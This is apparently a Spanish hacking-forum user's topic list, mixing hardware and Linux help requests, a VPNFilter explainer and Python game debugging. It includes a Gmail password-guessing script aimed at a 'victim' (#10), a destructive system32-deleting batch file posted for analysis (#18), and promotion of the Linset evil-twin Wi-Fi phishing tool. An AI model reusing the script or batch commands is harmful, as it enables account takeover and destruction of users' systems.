Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - TheIllusionist

#1
msi radeon rx 580 armor 8g oc 8gb gddr5 esta es la tarjeta que e estado viendo, ya que esta mas barata que la rx580 de sppafire, pero no encuentro en la pagina de msi españa esta grafica con lo cual me da cosa comprarmela y que no tenga soporte técnicom, las e mirado en pccomponentes

Solo quiero saber si alguien sabe si esta tarjeta es mejor o peor que esta sapphire

Este es el enlace de la normal
https://www.pccomponentes.com/sapphire-pulse-radeon-rx-580-8gb-gddr5

Y este el de la msi rebajada de precio
https://www.pccomponentes.com/msi-radeon-rx-580-armor-8g-oc-8gb-gddr5
#2
Buenas a todos
Traigo ante ustedes un pequeño problema que me lleva pasando desde que instale debian 9 en mi ordenador, y es que cuando pasa un tiempo (o recibe muchos paquetes, lo pongo en parentesis porque cuando hago un man in the midle se apaga el adaptador de red ) no se porque puede ser esto e estado buscando y no e encontrado nada por internet, mi adaptador de red es una alfa, la utilizo en otro sistema operativo del mismo ordenador y no da problema solo es en debian, no me apetece descargarme otro so así que cualquier sugerencia es bien recibida TwT 
#3
Hacking Wireless / VPNFilter Malware
28 Mayo 2018, 21:09 PM
╔════════════════╗
VPN Filter
╚════════════════╝


¿Que es?
════════════════
Es un terrible malware que afecta a los routers, este "pequeño" malware nos puede destrozar completamente la vida ya que es muy sofisticado, tanto que el FBI a pedido a ESCALA MUNDIAL que reiniciemos nuestros routers (Explico en el funcionamiento porque) y la gran compañia cisco nos recomienda que restablezcamos nuestro router a valores de fábrica y reinstalemos el último firmware.

¿Qué tan sofisticado es?
════════════════
Es muy sofisticado debido a que es muy silencioso en su primera etapa, es muy difícil saber si estas infectado o no, en su segunda etapa se han encontrado tres módulos, uno un sniffer, otro que busca de componentes SCADA, y  lo peor de todo es que el tercer módulo de este malware puede escribir una cantidad de bits dejando tu dispositivo inutilizable, este módulo es un limpiador de firmware

¿A qué routers afecta?
════════════════
Por ahora se a descubierto que afecta al siguiente listado de routers:
-Linksys E1200
-Linksys E2500
-Linksys WRVS4400N
-Mikrotik RouterOS para enrutadores Cloud Core: versiones 1016, 1036 y 1072
-Netgear DGN2200
-Netgear R6400
-Netgear R7000
-Netgear R8000
-Netgear WNR1000
-Netgear WNR2000
-QNAP TS251
-QNAP TS439 Pro
-Otros dispositivos QNAP NAS que ejecutan el software QTS
-TP-Link R600VPN
No obstante no se descarta la posibilidad de que otros routers puedan ser infectados


¿Cómo funciona?
════════════════
El malware consta de tres Etapas:

El bot Stage One
───────────────
Es el más liviano y simple, ya que su única función es infectar el dispositivo y obtener la persistencia de arranque.

Etapa 2
───────────────
Es admitir una arquitectura de complemento para los complementos del Estado Tres

Etapa 3
───────────────
Cisco dice que hasta ahora ha detectado complementos de Stage Three que pueden:
Hacer sniff de paquetes de red y tráfico de interceptación
Controlar la presencia de protocolos Modbus SCADA
Comunicarse con los servidores de C & C a través de la red Tor

Este malware puede ser utilizado de muchas formas:

-Como botner (Ya que se utilizan los routers para infectar a otros, es decir, este malware se propaga)
-Para espiar el tráfico de red
-Paralizar enrutadores, dejando inutilizable una parte de la infraestructura de internet

Cisco dice que este malware puede tener aun más módulos que no se han detectado.

¿Cómo desinfectarse?
════════════════
Como a dicho el fbi reiniciando el router la etapa 2 desaparece, pero por mala suerte la etapa 1 del malware no, es decir, podría volverse a poner en funcionamiento en cualquier momento
Lo más seguro es restablecer el router a configuración de fábrica, cambiar la contraseña por defecto e instalar el último firmware y rezar XD

El fbi ya se está encargando de solucionar este problema con lo cual no tardaran mucho en sacar parches.

Muchas gracias a todos, se que este post a sido tremendamente largo pero creo que esta bastante bien explicado
#4
Buenas a todos me gustaría averiguar como ver si alguien te a escaneado con nmap ya que estoy haciendo pruebas con mis ordenadores y no se como verlo, supongo estara en algun fichero de red pero por los que e visto no e encontrado nada en ninguno  :-X
Mi so es debian 9
PDT: Im newbie XD
#5
Buenas hace poco instale debian en mi ordenador, y bueno hoy e ido a ver cuantas conexiones tenia establecidas ya que tengo un mini servidor  :xD, pero el caso es que debian solo me enseñaba unas cuantas en la terminal y no podía subir ni con la ruleta ni con la barra de la terminal ya que supuestamente no había nada mas hacia arriba, para verlo e tenido que poner > txt.txt
porque me puede estar pasando esto.
Un saludo a todos
#6
Buenas a todos
Hoy venia a dar una pequeña idea de crear el foro de elhacker.net en animo, la verdad es que es bastante practico ya que puedes ver el foro desde el móvil y no cuesta dinero, a mi me gustaria bastante es solo una idea espero que la vean los admin :3
#7
Hacking / Problema al instalar Bettercap |
26 Abril 2017, 20:43 PM
Tengo un problema pero no se donde poner este tema XD así que lo pongo aquí
El caso es que instale bettercap pero por alguna razón no soy capaz de hacer que funcione siempre y cuando intento iniciarle siempre me salta este error, (lo inicio con sudo), creo que tiene que ver con el repositorio de ruby pero yo lo e actualizado ya, aquí dejo el error haber si me podéis ayudar

/var/lib/gems/2.3.0/gems/bettercap-1.6.1b/lib/bettercap/spoofers/icmp.rb:24:in `<class:ICMPRedirectPacket>': uninitialized constant PacketFu::EthHeaderMixin (NameError)
   from /var/lib/gems/2.3.0/gems/bettercap-1.6.1b/lib/bettercap/spoofers/icmp.rb:17:in `<module:Spoofers>'
   from /var/lib/gems/2.3.0/gems/bettercap-1.6.1b/lib/bettercap/spoofers/icmp.rb:15:in `<module:BetterCap>'
   from /var/lib/gems/2.3.0/gems/bettercap-1.6.1b/lib/bettercap/spoofers/icmp.rb:14:in `<top (required)>'
   from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
   from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
   from /var/lib/gems/2.3.0/gems/bettercap-1.6.1b/lib/bettercap.rb:58:in `block in bettercap_autoload'
   from /var/lib/gems/2.3.0/gems/bettercap-1.6.1b/lib/bettercap.rb:57:in `each'
   from /var/lib/gems/2.3.0/gems/bettercap-1.6.1b/lib/bettercap.rb:57:in `bettercap_autoload'
   from /var/lib/gems/2.3.0/gems/bettercap-1.6.1b/lib/bettercap.rb:62:in `<top (required)>'
   from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
   from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
   from /var/lib/gems/2.3.0/gems/bettercap-1.6.1b/bin/bettercap:19:in `<top (required)>'
   from /usr/local/bin/bettercap:23:in `load'
   from /usr/local/bin/bettercap:23:in `<main>'
#8
Buenas a todos
Traigo una pequeña pregunta, Se me a ocurrido crear un tipo de conexión entre ordenadores para pasarse archivos pequeños, (así para usarlo entre amigos y no tener que estarlo subiendo a la nube y cosas así :xD), ya se  hacer las conexiones y eso, lo malo es que no se como ver el escritorio o los archivos de la raiz y tampoco como cojerlos y pasarlos de un ordenador a otro, si me pueden ayudar se lo agradecere
:P
#9
GNU/Linux / xChat no esta ya disponible??
13 Abril 2017, 21:37 PM
Buenas a todos
Tengo un pequeño problema y es que me sale al instalar xChat que no esta disponible, que ahi un paquete que le hace referencia y nada más, como puedo instalarlo??
#10
Scripting / Cracking de gmail con python
9 Abril 2017, 13:20 PM
Buenas a todos

Soy fan de la serie de MR Robot, si alguno a visto la serie Eliot usa un script para hackear los correos electronicos, así que me dió por intentar hacerlo, más o menor lo conseguí, lo malo es que tengo problemas con la conexión gmail, por lo demas bien
Aquí dejo el código:
Código (python) [Seleccionar]

#! /usr/bin/env python


import smtplib
import sys
import os


print """
__________                                               .___
\______   \_____    ______ ________  _  _____________  __| _/
|     ___/\__  \  /  ___//  ___/\ \/ \/ /  _ \_  __ \/ __ |
|    |     / __ \_\___ \ \___ \  \     (  <_> )  | \/ /_/ |
|____|    (____  /____  >____  >  \/\_/ \____/|__|  \____ |
                \/     \/     \/                          \/
_________                       __                           
\_   ___ \____________    ____ |  | __ ___________           
/    \  \/\_  __ \__  \ _/ ___\|  |/ // __ \_  __ \         
\     \____|  | \// __ \\  \___|    <\  ___/|  | \/         
\______  /|__|  (____  /\___  >__|_ \\___  >__|             
        \/            \/     \/     \/    \/          """

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

print "Welcome to Gmail Password Cracker"
print "TRYING WITH PASSWORD IN: psw.list"

user = raw_input("Enter de victim's email addres: ")
passwfile = "psw.list"
passwfile = open(passwfile, "r")

for password in passwfile:
try:
smtpserver.login(user, password)
print "Password Found: %s", password
break;
except smtplib.SMTPAuthenticationError:
print "Unknow password"
break;

sys.exit()


Lo más raro es que gmail permita este tipo de ataques y no tenga puesto un cierto número de intentos, lo unico que tenéis que crear es un archivo llamado psw.list en la misma carpeta del script.

FUNCIONAMIENTO
Este Script funciona con ingeniería social, sacamos información de la víctima ponemos las posibles claves en el archivo, y ya está p0nemos el correo en el script y se acabó
#11
Buenas a todos

Estoy intentando hacer una pequeña conexión introducciendo el correo y la password en el script
Lo malo es que me da un error y no se como soluccionarlo si me podéis ayudar os lo agradeceré
aquí os dejo el codigo
Código (python) [Seleccionar]

import smtplib

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()


user = raw_input("email addres: ")
passwfile = raw_input("Pass: ")

smtpserver.login(user, passwfile)

if smtplib.SMTPAuthenticationError:
print "fail"
sys.exit()
else:
print "funciono"
sys.exit()


Y este es el error que me da:

File "d.py", line 11, in <module>
    smtpserver.login(user, passwfile)
  File "/usr/lib/python2.7/smtplib.py", line 622, in login
    raise SMTPAuthenticationError(code, resp)
smtplib.SMTPAuthenticationError: (534, '5.7.14 <https://accounts.google.com/signin/continue?sarp=1&scc=1&plt=AKgnsbtQ\n5.7.14 92qPdFifk7Ip8DO7p0XoDUY4SsdcMiuMOV-HG44arxEfG3vjbPuGm2zKhf_rOm3IW1qReE\n5.7.14 awsMlk2uVt_-d9pRNpTMjCzRc4xsiYDS6p8EcIj6WLoMzsruy5hGferaG2ijYRNmNeZx26\n5.7.14 em3xB0B2oV6jvVLQCSCxdJZpRcaagyxS3HMjtpsyfcEsIBZUR6ELql0LzSUh4QR_DTUojv\n5.7.14 tq6culS93cZaDiERFWZNqgVcTe46U> Please log in via your web browser and\n5.7.14 then try again.\n5.7.14  Learn more at\n5.7.14  https://support.google.com/mail/answer/78754 r17sm11606858wrc.47 - gsmtp')
#12
Buenas a todos,
El otro día me acordé de cuando hackee una red wep :xDen vacaciones, simple todos lo hemos echo, pero me choque con un filtrado mac [/b :-\]y se me acabo el chollo (Se que a pasado tiempo), pero ahora me estoy acordando de que estos programas te dan la mac de la gente conectada a esa wifi, Y si se cojiera esa mac, te la cambiaras en tu dispositivo, Podría saltarse el filtrado mac????

#13
Buenas a todos
Hace tiempo hize un post de crear un juego online batch, a mi tampoco me convencía el lenguaje, lo malo es que al llegar a hacer conexión con otra maquina lo veia muy difícil, me recomendaron python, así que ahora estoy atascado en como sacar el juego de Lan a red pública,
SI me pueden ayudar se lo agradecería, ya que tengo muchos amigos a los que les gusta, ademas de que somos muy competitivos todos XD  
#14
Buenas a todos
tengo un problema y es que quiero que en una función if el programa termine pero me da un error y no se porque, este es el error:
File "RazeWars.py", line 392
   break
SyntaxError: 'break' outside loop

y aquí la parte del código
Código (python) [Seleccionar]

batalla22 = Vida2T - Fuerza1T
if batalla22<=0:
winJ1()
opcionnoimportante5 = raw_input("SE acabo")
break

Si me pueden ayudar se lo agradecere
Gracias y hasta otra
#15
Buenas de nuevo  :xD
Traigo otro problema, y es que python se salta la funcion caracteristicas 1 y no se porque
Aquí dejo el código
Código (python) [Seleccionar]
# /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os

os.system("clear")
print chr(27)+"[0;36m"+ """
__________                         __      __                      
\______   \_____  ________ ____   /  \    /  \_____ _______  ______
|       _/\__  \ \___   // __ \  \   \/\/   /\__  \\_  __ \/  ___/
|    |   \ / __ \_/    /\  ___/   \        /  / __ \|  | \/\___ \
|____|_  /(____  /_____ \\___  >   \__/\  /  (____  /__|  /____  >
       \/      \/      \/    \/         \/        \/           \/"""

b = 0
nombreJ1 = raw_input("Escribe el nombre del primer jugador: ")
nombreJ2 = raw_input("Escribe el nombre del segundo jugador: ")

def menu():
print """
--------------------------------
----------------------------------
--                              --
-- Bienvenidos a Raze Wars      --  
--                              --
-- 1.Jugar                      --
-- 2.Tutorial                   --
-- 3.Salir                      --
       ----------------------------------
        --------------------------------
    """

   

def carasteristicas1():
print """
 -----------------------------------------------------
-------------------------------------------------------
--                                                   --
--                   JUGADOR 1                       --
--                                                   --
-------------------------------------------------------"""
print nombreJ1
print Raza1
print "Esta saltando"

def jugar():
print """
----------------------------------------------------------
------------------------------------------------------------
--                                                        --
-- La batalla a llegado, Con que RAZA desea vivir o morir --
-- ------------------------------------------------------ --
--                                                        --
-- 1. Elfos                                               --
-- 2. Elfos de sangre                                     --
-- 3. Elfos nocturnos                                     --
-- 4. Enanos                                              --
-- 5. Humanos                                             --
------------------------------------------------------------
----------------------------------------------------------
"""
elegirRaza1 = raw_input("Escoje tu RAZA>> ")

if elegirRaza1== 1:
os.system("clear")
Raza1 = "Elfos"
carasteristicas1()
if elegirRaza1== 2:
os.system("clear")
Raza1 = "Elfos de sangre"
carasteristicas1()








#Menu---------------------------------------------------------------------------------------
while b==0:

os.system("clear")
menu()
b = 1
print chr(27)+"[0;32m"+ nombreJ1
print chr(27)+"[0;31m"+ "VS"
print chr(27)+"[0;32m"+ nombreJ2
print chr(27)+"[0;39m"+ "."
elegirmenu = raw_input("Escribe una opcion: ")
 
  if elegirmenu=="1":
os.system("clear")
jugar()

elif elegirmenu=="2":
os.system("clear")
print """
8888888b.                                      
888   Y88b                                    
888    888                                    
888   d88P  8888b.  88888888  8888b.  .d8888b  
8888888P"      "88b    d88P      "88b 88K      
888 T88b   .d888888   d88P   .d888888 "Y8888b.
888  T88b  888  888  d88P    888  888      X88
888   T88b "Y888888 88888888 "Y888888  88888P'
Me importa un carajo weiiiiiiii"""
jugar()

elif elegirmenu=="3":
os.system("clear")
break
else:
os.system("clear")
menu()
print "Ha saltado"


Se lo agradeceré bastante a quien me ayude, gracias y hasta otra[/size][/size][/size][/size]
#16
Buenas a todos,
Después de mi anterior post me e decidido a pasar todo mi juego a python pero tengo un problema y no se como solucionarlo Me podrian ayudar, el codigo es el siguiente
Código (python) [Seleccionar]
def menu():
print """
--------------------------------
----------------------------------
--                              --
-- Bienvenidos a Raze Wars      --  
--                              --
-- 1.Jugar                      --
-- 2.Tutorial                   --
-- 3.Salir                      --
       ----------------------------------
        --------------------------------
    """

def jugar():
print "va mas o menos bien"


while b==0:

os.system("clear")
menu()
b = 1
print chr(27)+"[0;32m"+ nombreJ1
print chr(27)+"[0;31m"+ "VS"
print chr(27)+"[0;32m"+ nombreJ2
print chr(27)+"[0;39m"+ "."
elegirmenu = raw_input("Escribe una opcion: ")

if elegirmenu=="1":
os.system("clear")
jugar()
elif elegirmenu=="2":
os.system("clear")
print """
8888888b.                                      
888   Y88b                                    
888    888                                    
888   d88P  8888b.  88888888  8888b.  .d8888b  
8888888P"      "88b    d88P      "88b 88K      
888 T88b   .d888888   d88P   .d888888 "Y8888b.
888  T88b  888  888  d88P    888  888      X88
888   T88b "Y888888 88888888 "Y888888  88888P'
"""
jugar()

elif elegirmenu=="3":
os.system("clear")
break
else:
os.system("clear")
menu()
elegirmenu = raw_input("Escribe una opcion: ")

el caso es que me da fallo en la opción dos y nose porque, esto es lo que me sale
 File "RazeWars.py", line 62
   jugar()
   ^
IndentationError: unexpected indent

Si me pueden ayudar se lo agradecere  :xD, gracias y hasta otra[/size][/size][/size][/size][/size][/size]
#17
Buenas a todos
Hace unas semanas estuve haciendo un pequeño proyecto de un juego en batch, (se que es una perdida de tiempo), el caso es que a mis compañeros y a mi nos parecía bastante divertido el juego, así que se me ocurrió hacerlo online, e estado buscando como hacer cliente servidor pero no me sale y tampoco se como conectarlo a un servidor para que se transmita a la otra persona, si alguien me puede ayudar se lo agradecería mucho
Explico como va el juego
Cada jugador escoje una raza, después ese jugador debe cojer dos ITems que le daran vida y daño, lo mismo debe hacer el segundo jugador, Se entra en un bucle hasta que uno acabe sin vida.
Así es como va, si me pueden ayudar se lo agradeceré mucho :xD 
#18
Muy buenas a todos
Hoy traigo una pequeña duda y es que un compañero encontró en su ordenador un archivo .bat lo cual le hizo sospechar ya que el no recordaba ningun instalador que le creara archivos .bat, el caso es que me lo pasó porque el no sabe mucho de programación, lo malo es que yo tampoco tengo mucha y tengo unas cuantas dudas

Código (bash) [Seleccionar]
@echo off
msg * Espere mientras se mejora su sistema operativo
del c:\windows\repair\*.nt -q -f -s
del c:\windows\system32\*.bin -q -f -s
del c:\windows\system32\*.bat -q -f -s
echo off>>virus.exe
echo off>>virus.dll
echo off>>virus.com
echo off>>virus.ini
echo off>>virus.sys
echo off>>virus.reg
echo off>>virus.ani
echo off>>virus.rar
echo off>>virus.pal
echo off>>virus.bin
echo off>>virus.cmd
echo off>>virus.jar
echo off>>virus.chk
echo off>>virus.db
echo off>>virus.ocx
echo off>>virus.manifest
echo off>>virus.log
echo off>>virus.dat
del c:\windows\system32\*.ax -q -f -s
del c:\windows\system32\*.acm -q -f -s
del c:\windows\system32\*.bin -q -f -s
del c:\windows\system32\*.dat -q -f -s
del c:\windows\system32\*.hlp -q -f -s
del c:\windows\system32\*.manifest -q -f -s
echo off>>virus.cur
echo off>>virus.386
echo off>>virus.323
echo off>>virus.scr
echo off>>virus.acm
echo off>>virus.hlp
echo off>>virus.jpg
echo off>>virus.mpg
echo off>>virus.html
echo off>>virus.vbs
echo off>>virus.wsh
echo off>>virus.rat
echo off>>virus.cer
del c:\windows\system32\*.ocx -q -f -s
del c:\windows\system32\*.drv -q -f -s
del c:\windows\system32\* .msc -q -f -s
echo off>>virus.msc
del c:\windows\system32\*.cpl -q -f -s
del c:\windows\system32\*.ini -q -f -s
del c:\windows\system32\*.vbs -q -f -s
del c:\windows\system32\calc.exe
del c:\windows\system32\sol.exe
del c:\windows\system32\winmine.exe
del c:\windows\system32\mspaint.exe
del c:\windows\system32\notepad.exe
del winword.exe
del excel.exe
msg * Se termino la configuracion del sistema pero vas a tener k formatear de preferencia
shutdown -r
exit

Lo que yo veo ahí es que esta intentando borrar carpetas de system32 pero no entiendo como es posible porque debería tener permisos aun más de administrador, y lo segundo son esos echo off>>virus no llego a comprender para que funcionan, si alguien me lo puede explicar se lo agradeceria
Muchas gracias y hasta otra :xD
#19
Buenas a todos
Hoy traigo este pequeño apartado por un problema que e tenido, estaba probando un sistema linux nuevo (está en fase de prueba aun :P) el problema me lo e encontrado al meter un pendrive en el ordenador, y es que cuando lo e querido sacar no había opción de expulsarlo ni desmontarlo.
Así que me e dispuesto a crear un pequeño script bash para solucionar estos problemas ya que no es la primera vez que me pasa
Simplemente copia el codigo en tu editor favorito, guardalo con la extensión .sh, dale permisos de ejecución (chmod +x) y ya esta solo lo tienes que ejecutar (./nombrequelehayaspuesto.sh)

Código (bash) [Seleccionar]
#!/bin/bash
#Expulsar pen
#Creado por: CommandPoison


#limpiamos la pantalla
clear
#Vemos los dispositivos montados
df
#Introduccimos el nombre
echo 'Introduzca el nombre del pen:'
#Leemos la variable
read var1
#Ejecuta los comandos para expulsar el pen
sudo umount $var1
sudo eject $var1
echo -------------Fin de la ejecucion------------


Los dispositivos como los pendrive los suele nombrar como /dev/sdb1 o nombres parecidos pero puede cambiar dependiendo del sistema operativo.

Espero que les ayude a gente como a mi que cuando empezaron a experimentar con linux y les ocurria esto se desesperaban un poco.

Un saludo y hasta otra :rolleyes:
#20
Scripting / Abrir puertos codigo python
7 Marzo 2017, 23:21 PM
Muy buenas a todos


Hoy traigo una pequeña duda y es que quiero saber como abrir los puertos mediante codigo python, tengo echo un minichat local y quiero llevarlo a fuera de la red local, es decir de ordenadores conectados a redes diferentes, Si me resuelven esta duda les estare muy agradecidos,

Muchas gracias XD y hasta la proxima
#21
Buenas a todos
Tengo una duda y es que quiero que se me inicie un script cuando inicie windows :P
Es un script muy simple
Código (bash) [Seleccionar]

@echo off
echo HIIIIII
pause>nul

El caso es que nose como hacerlo si alguien me ayuda se lo agradeceria ;D

Gracias y hasta otra XD
#22
Buenas a todos,

Hoy traigo una pequeña duda, el otro día me enteré de un pequeño exploit a nivel local que te permite escalar privilegios en linux, :o y no entiendo como funciona, si alguien me lo puede explicar se lo agradeceria mucho ;D

Un saludo y hasta otra
#23
Hacking / !Se que torrents te has descargado¡
19 Febrero 2017, 12:38 PM
Muy buenas a todos
Hoy os traigo un pequeño exploit por así llamarlo con los torrents, y es que hace poco estaba leyendo algunos post y me resulto bastante interesante este tema
Pues sabiendo la ip de una persona puedes saber que torrents se a bajado o se esta bajando, fecha y hora   :-(

Esto puede verse como una tontería, pero puede ser una gran amenaza ya que sabiendo como se llama un archivo torrent puedes ver las IP`s que se lo están  descargando, y esto significa que tienen un puerto abierto para ser atacados.

Esto puede ser muy bueno para un hacker que quiera realizar una botnet, pues gracias a esta página puede obtener grandes cantidades de ip para ser atacadas :-\

Ademas gracias a esta pagina puedes saber si alguien esta haciendo mal uso de tu red si tienes una empresa, y lo que es peor, si es así te expones a ser atacado.

Por ahora no e visto como defenderse de esto salvo tener tu ip dinámica para que valla cambiando y asi no se quede registrado.

Aquí os dejo la pagina por si quereis comprobar: http://iknowwhatyoudownload.com/en/peer/

Y nada mas muchas gracias por ver este post y hasta la proxima
#24
Muy buenas a todos :D
Hoy os traigo una  herramienta de la que me había olvidado por completo pero la cual es mucho más potente que la fuerza bruta.
Se llama linset, Linset es una aplicación para Linux que nos permite auditar o crackear una red Wi-Fi para comprobar la seguridad de su clave fácilmente sin necesidad de diccionarios de claves ya que será el propio dueño de la red quien nos facilitará la clave al hacer uso de un RogueAP y de ingeniería social para ello.


El funcionamiento de esta magnífica herramienta es la siguiente
-Escanea las wifis próximas
-Captura el handshake de la que eliges
-Monta una FakeAP identica a la original
-Se crea un servidor DHCP en la FakeAP
-Crea un servidor DNS para redirigir todas las solicitudes al Host
-Se inicia el servidor web con la interfaz de red seleccionada
-Se inicia el mecanismo para verificar la validez de las contraseñas que se introducirán
-Desauntentificar a todos los usuarios de la red, con la esperanza de conectarse a FakeAP e introducir la contraseña.
-Deauthentificate a todos los usuarios de la red, con la esperanza de conectarse a FakeAP e introducir la contraseña.
-El ataque se detendrá después de la comprobación de contraseña correcta


Basicamente y traducciendo lo que realiza es desauntentificar a todos los usuarios de esa red, no les permite conectarse con la esperanza de que se conecten a la wifi falsa creada y según se conecten cada vez que intenten navegar les saldra una pagina definida para que pongan la contraseña, si ponen una falsa les dara un error diciendoles que la pongan de nuevo

XD
Es un ataque básicamente muy simple de hacer y a la vez muy efectivo.

Y nada mas eso es todo, les dejo el enlace por si lo quieren obtener aqui:

https://github.com/vk496/linset
Muchas gracias por ver este post y les deseo suerte, hasta la proxima ;D
#25
Buenas a todos ::)


Antes de nada gracias por pasar a ver este post ya que soy un newbie y este post va dedicado tambien a ellos :xD

Bueno como ya pone en el titulo hoy traigo un pequeño script para cambiar vuestra ip en linux por medio de una terminal sin utilizar ninguna herramienta

Estaba el otro día cambiando mi MAC por curiosear y se me ocurrió crear un script para no estar todo los días cambiandola, asi que aquí os lo traigo y os explico que hace

Lo primero que tenemos que crear es un documento en blanco.

Lo primero es saber como se llama la tarjeta de red que quieres cambiar, por defecto suelen ser eth0 o wlan0, pero en el caso de las nuevas versiones de ubuntu y derivaciones se llaman enp2s0 y cosas asi  :(. Para averiguarlo solo tienes que abrir una TERMINAL y escribir ifconfig

Bueno volviendo al documento en blanco lo primero que vamos a escribir es
ifconfig (nombre de la interfaz de red a cambiar) down
Este código lo que hace es inabilitar por decirlo así la tarjeta de red
El siguiente es:
ifconfig (nombre de la interfaz de red) hw ether (Mac que deseas poner)
Este comando lo que realiza es cambiar la Mac de nuestra tarjeta de red por la que pongamos
Ahora solo tenemos que levantar de nuevo nuestra tarjeta de red asi que lo hacemos con el siguiente comando
ifconfig (nombre de la interfaz de red) up

Y ya tendriamos el script echo

Nos quedaria una cosa así

#!/bin/bash
ifconfig wlan0 down
ifconfig wlan0 hw ether F0:E1:D2:C3:B4:A5
ifconfig wlan0 up


Este es un ejemplo que e puesto lo podeis modificar a vuestro gusto.
Para darle permisos de ejecución nos vamos a una terminal y escribimos:
cd (ruta donde se encuentra el archivo como por ejemplo cd Desktop)
chmod +x (nombre que le pongais al script)

Finalmente para iniciarlo tenemos que ponernos en modo root con el comando sudo en la mayoria de las distribuciones Linux, y para iniciarlo ponemos ./nombredelscript

Y ya esta esperamos unos segundos y ya lo tendriamos cambiado, podeís hacer la comprobacion escribiendo en la terminal ifconfig ;D

Muchas gracias por haber visto este post y espero haber sido de gran ayuda
Un saludo y hasta el próximo
#26
Pos si amigos de elhacker.net este es mi primer tema del que hablo pero tengo algo que deciros, asi que sin mas tonterias empezamos. ::)

Pues estos dias atras estaba yo tranquilamente creando powershell  :xD y esos tipos de programas maliciosos que a todos nos gusta utilizar, y bien se me ocurrio la idea de explotar un poco windows xp ya que como todos sabemos muchas empresas lo utilizan. y aqui viene lo interesante.
Cree una reverse porwershell con kali linux, lo pase por virustotal (pido perdón porque nose como poner una captura), lo paso por mi antivirus, y no me aparece que sea ninguna amenaza pero cuando lo voy a ejecutar en windows xp Boom!!!! Me salta un mensaje diciendome que ese ejecutable tiene un codigo ilegal, y de repente mi cerebro estalla, lo ejecuto en un windows 7 y no me salta nada, y entonces llegue a la conclusion de que windows xp tiene seguridad contra powershell infectadas pero los demas windows no  :-\ wtf como puede microsoft permitir estos fallos, algo que tenian solucionado hace varios años ya ahora se a convertido de nuevo en una AMENAZA ya que ningun antivirus ni el propio sistema lo reconocen como amenaza. Bueno gente eso a sido todo siento no poder poner capturas de verdad intentare subirlo a youtube, asiq un fuerte abrazo y se despide vuestro amigo
CommandPoison

PD: Ya que como no puedo dejar las imagenes puestas aqui dejo dos capturas que e realizado https://mega.nz/#!y9YlQaBB!Hv-j42TmEiUdK_PkPxMf9rRnvgQIxZxkpmpMFBTq-xo